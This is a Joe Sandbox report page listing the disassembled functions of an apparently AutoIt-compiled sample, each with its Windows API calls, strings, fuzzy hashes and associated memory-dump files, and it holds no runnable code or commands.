Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: c9e90e927a96e9ab62c7d6e6bbee4b7d7d8819ad85aeb384da942220c83e2f40
Instruction ID: d613d761171af8392e25d22f137adf83f2563635104948b848217f83e71032c5
Opcode Fuzzy Hash: c9e90e927a96e9ab62c7d6e6bbee4b7d7d8819ad85aeb384da942220c83e2f40
Instruction Fuzzy Hash: 1AD1E2315043019FC714EF25C991BAABBE0AF88314F14855FF8895B3A2DB78DC45CB5A

Function 0046C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

NULL Pointer assignment, xrefs: 0046CCEE, 0046CCFF
Not an Object type, xrefs: 0046C916

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 7ecee637226c2c872d16161836704509c3b1b26866405edec995623da39a5dea
Instruction ID: 252e4ef872944e9f5162e8c17d6e9d1cbf03c65d84df6eec3240bd1c2f629f52
Opcode Fuzzy Hash: 7ecee637226c2c872d16161836704509c3b1b26866405edec995623da39a5dea
Instruction Fuzzy Hash: C6E1D3B1A00219ABDF10DFA4D881BBE77B5FF48314F14402EE985A7381E7789D45CB9A

Function 0046BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0046BFD4
VariantInit.OLEAUT32(?), ref: 0046C0A5
VariantInit.OLEAUT32(?), ref: 0046C1A6
VariantClear.OLEAUT32(?), ref: 0046C1B0
VariantClear.OLEAUT32(?), ref: 0046C211

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0046C189
Null Object assignment in FOR..IN loop, xrefs: 0046C035, 0046C163, 0046C21F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: d3734b7ae8f30536a169275bb329ac78618ebc48b612779a31949d608e389f66
Instruction ID: 11b17392ee00491fd7a25fefbf509e24a27d65dfe3ce3c47a34e3ed6921e0ac8
Opcode Fuzzy Hash: d3734b7ae8f30536a169275bb329ac78618ebc48b612779a31949d608e389f66
Instruction Fuzzy Hash: D491D070E00215ABCB20CFA5C884FAFB7B8AF45714F10815EF955AB241E7789941CFAA

Function 00413DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00413F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004134E2,?,00000001), ref: 00413FCD

_free.LIBCMT ref: 00483C27
_free.LIBCMT ref: 00483C6E

Part of subcall function 0041BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,004D22E8,?,00000000,?,00413E2E,?,00000000,?,004ADBF0,00000000,?), ref: 0041BE8B
Part of subcall function 0041BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00413E2E,?,00000000,?,004ADBF0,00000000,?,00000002), ref: 0041BEA7
Part of subcall function 0041BDF0: __wsplitpath.LIBCMT ref: 0041BF19
Part of subcall function 0041BDF0: _wcscpy.LIBCMT ref: 0041BF31
Part of subcall function 0041BDF0: _wcscat.LIBCMT ref: 0041BF46
Part of subcall function 0041BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0041BF56

Strings

E<A, xrefs: 00483B58
>>>AUTOIT SCRIPT<<<, xrefs: 00483A01
G-A, xrefs: 00483A4F
Bad directive syntax error, xrefs: 00483C54

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<A$G-A
API String ID: 1510338132-110942053
Opcode ID: a8f2a74b2523583fb072e99d485d0594e964cd768df74306733dbb21633da3b3
Instruction ID: 7a79e8f534e2798d455431b1a7743e03325b318d36bc491abca01d123624dac9
Opcode Fuzzy Hash: a8f2a74b2523583fb072e99d485d0594e964cd768df74306733dbb21633da3b3
Instruction Fuzzy Hash: 37918171900219AFCF04EFA5CC519EE77B4BF09715F10441FF816AB292DB38AA45CB58

Function 0042EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0042EADA,?,?), ref: 0042EB27
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0042EADA,?,?), ref: 00484B26
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0042EADA,?,?), ref: 00484B65
RegCloseKey.ADVAPI32(?,?,0042EADA,?,?), ref: 00484B94

Strings

Include, xrefs: 00484B1E, 00484B5D
Software\AutoIt v3\AutoIt, xrefs: 0042EB1D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: a540287a61785215f39cc49e550f1889420a0d450ceb8f62197c7a950f25e422
Instruction ID: ba44e426e7752c49417519b513cec543f95c630b5a717f7ffb448f5ee5493750
Opcode Fuzzy Hash: a540287a61785215f39cc49e550f1889420a0d450ceb8f62197c7a950f25e422
Instruction Fuzzy Hash: 2F116A71A00118BEEB04ABA4CD86EFF77BCEF54358F50046AB506E2190EA74AE41DB58

Function 00412E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00412ECB
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00412EEC
ShowWindow.USER32(00000000), ref: 00412F00
ShowWindow.USER32(00000000), ref: 00412F09

Strings

AutoIt v3, xrefs: 00412EC3, 00412EC8, 00412EC9
edit, xrefs: 00412EE6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d727da5f3d14ae5424e7efb644c3fc3ad143451bbbb3d9cea7d7a30d193629dd
Instruction ID: 085ed593b885da24aa0cc3dd5ce2a6d16a6ef75dbc65a5fc8fc17d4319786eea
Opcode Fuzzy Hash: d727da5f3d14ae5424e7efb644c3fc3ad143451bbbb3d9cea7d7a30d193629dd
Instruction Fuzzy Hash: BEF03A70A412D07AE7326767AC48E672F7DD7D7F20F01403FBE08A25B0C2650881CAB8

Function 0046936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00469409
WSAGetLastError.WS2_32(00000000), ref: 00469416
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 0046943A
_strlen.LIBCMT ref: 00469484
_memmove.LIBCMT ref: 004694CA
WSAGetLastError.WS2_32(00000000), ref: 004694F7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLast$_memmove_strlenselect
String ID:
API String ID: 2795762555-0
Opcode ID: 23f16919db2e6a2257fe88dca096ee8a144aba8a8e931bc303d74943030fda91
Instruction ID: 0ba474296b44b307fd69d9c240d9c27fb1ce7799b5535ab8905bd51aef4d7905
Opcode Fuzzy Hash: 23f16919db2e6a2257fe88dca096ee8a144aba8a8e931bc303d74943030fda91
Instruction Fuzzy Hash: B341F271904104AFCB04EBA5CD85AEEB7BCEF48314F10416BF50697291EF78AE41CB69

Function 00456D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00413B1E: _wcsncpy.LIBCMT ref: 00413B32

GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00456DBA
GetLastError.KERNEL32 ref: 00456DC5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00456DD9
_wcsrchr.LIBCMT ref: 00456DFB

Part of subcall function 00456D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00456E31

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 0af72b4f39d8db0a0321acefc2b35c93a8ffb0fa4e37532e32b8ee6a49008deb
Instruction ID: a008dded4b520b12c4d8071fdbf879aff98d53a4f71a446aec03216b89583823
Opcode Fuzzy Hash: 0af72b4f39d8db0a0321acefc2b35c93a8ffb0fa4e37532e32b8ee6a49008deb
Instruction Fuzzy Hash: F121C675A0231456DF206774EC4AAEB336C8F11712FA1066BEC25C3193EF28DE8C9A5D

Function 00469122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0046ACD3: inet_addr.WS2_32(00000000), ref: 0046ACF5

socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00469160
WSAGetLastError.WS2_32(00000000), ref: 0046916F
connect.WS2_32(00000000,?,00000010), ref: 0046918B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 80589da2c1ab6cf41cf5bcf74bc8112da94d2110de08da0c6658cfb4446d2dc1
Instruction ID: 45c800395b3f6b00e351b0f24c7645215af09d47b9c2aad72478191a516b0017
Opcode Fuzzy Hash: 80589da2c1ab6cf41cf5bcf74bc8112da94d2110de08da0c6658cfb4446d2dc1
Instruction Fuzzy Hash: C3219631600211AFDB00AF68CC89B6EB7ADEF49714F14846FF91697391DBB8EC418759

Function 0046F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

dEL, xrefs: 0046F865

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID: dEL
API String ID: 0-1123748885
Opcode ID: 966f97089a438ed31d49a15984d8947a949235091ed1d98ed8d0e496b938a084
Instruction ID: 74f631de47eab0f2b4504f401d7b07fb92de0130e712827fcf54b74fbbefc5a7
Opcode Fuzzy Hash: 966f97089a438ed31d49a15984d8947a949235091ed1d98ed8d0e496b938a084
Instruction Fuzzy Hash: F3F18C71A047019FC710DF25D581B5AB7E1FF88318F14892EF9998B392E738E949CB86

Function 00413A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(1<A), ref: 00413A7D
SHGetPathFromIDListW.SHELL32(?,?), ref: 00413AD2
SHGetDesktopFolder.SHELL32(?), ref: 00413A8F

Part of subcall function 00413B1E: _wcsncpy.LIBCMT ref: 00413B32

Strings

1<A, xrefs: 00413A70, 00413B06, 00413AF1, 00413A76, 00413AF9, 00413B09

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DesktopFolderFromListMallocPath_wcsncpy
String ID: 1<A
API String ID: 3981382179-2831179340
Opcode ID: 6258d97f12b49060b0dd0f42732305d3d538051d8448a98024abdc42a82e26d9
Instruction ID: 48133c017ed1ac06501887af301c1372c8b980ff9f9910fe5ab5d998db07a260
Opcode Fuzzy Hash: 6258d97f12b49060b0dd0f42732305d3d538051d8448a98024abdc42a82e26d9
Instruction Fuzzy Hash: BF219D32B00114ABCB14DF95D884DEFB7BDEF88701B1040AAF509DB245EB34AE46CB98

Function 0042C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0042C948,SwapMouseButtons,00000004,?), ref: 0042C979
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0042C948,SwapMouseButtons,00000004,?,?,?,?,0042BF22), ref: 0042C99A
RegCloseKey.KERNEL32(00000000,?,?,0042C948,SwapMouseButtons,00000004,?,?,?,?,0042BF22), ref: 0042C9BC

Strings

Control Panel\Mouse, xrefs: 0042C977

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 9dff41a9aabe1bca96e4dda07ecb9701986f8c8b906762f496a3593676f6c69e
Instruction ID: f3e0a35941260601c849eae173a90ea24b66abe50546dfcc0069bc379f988014
Opcode Fuzzy Hash: 9dff41a9aabe1bca96e4dda07ecb9701986f8c8b906762f496a3593676f6c69e
Instruction Fuzzy Hash: 1E117CB5A11218BFDB108F64EC84EAF77B8EF14744F40442BA941E7210D2319E919B68

Function 0044A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b29e1db787c27178cb010a3d365002061ec7b46e85b2eae197096a9b7d3c2c
Instruction ID: 8c66bcb66caddf421c33bfb4a434910ae106d22fc0a675630d408b8445c0486e
Opcode Fuzzy Hash: b3b29e1db787c27178cb010a3d365002061ec7b46e85b2eae197096a9b7d3c2c
Instruction Fuzzy Hash: B7C1C074A00216EFEB14CF94C884EAEB7B5FF48304F10459AE901EB251D734EE51CBA5

Function 0041131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004116F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00411751

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0041159B
CoInitialize.OLE32(00000000), ref: 00411612
CloseHandle.KERNEL32(00000000), ref: 004858F7

Strings

'/E, xrefs: 00411406, 00411450, 0041146C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID: '/E
API String ID: 458326420-3605595141
Opcode ID: 5877a4ad2227e3e86661ccdc448d71a4ad57635983971bece0fd1906dbd0a34c
Instruction ID: 45ba5041497d9854497ab90edc46052a5453dfe52812fbe43cd517e0a2c011f4
Opcode Fuzzy Hash: 5877a4ad2227e3e86661ccdc448d71a4ad57635983971bece0fd1906dbd0a34c
Instruction Fuzzy Hash: F271AEB4A06241BBC704DF9AB9A0594BBE5F759348794827FDC0A87372CB784444CF5D

Function 0045CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 004141A7: _fseek.LIBCMT ref: 004141BF

Part of subcall function 0045CE59: _wcscmp.LIBCMT ref: 0045CF49
Part of subcall function 0045CE59: _wcscmp.LIBCMT ref: 0045CF5C

_free.LIBCMT ref: 0045CDC9
_free.LIBCMT ref: 0045CDD0
_free.LIBCMT ref: 0045CE3B

Part of subcall function 004328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00438715,00000000,004388A3,00434673,?), ref: 004328DE
Part of subcall function 004328CA: GetLastError.KERNEL32(00000000,?,00438715,00000000,004388A3,00434673,?), ref: 004328F0

_free.LIBCMT ref: 0045CE43

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
Instruction ID: a00f9910ba98fe4e92ea296ae77eb01a84e2ca01815af1e96222d129bd149dca
Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
Instruction Fuzzy Hash: 9A514BB1D04218AFDF149F65CC81BEEBBB9EF48304F1040AEF619A3291D7755A848F69

Function 00411E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411E87

Part of subcall function 004138E4: _memset.LIBCMT ref: 00413965
Part of subcall function 004138E4: _wcscpy.LIBCMT ref: 004139B5
Part of subcall function 004138E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004139C6

KillTimer.USER32(?,00000001), ref: 00411EDC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00411EEB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00484526

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
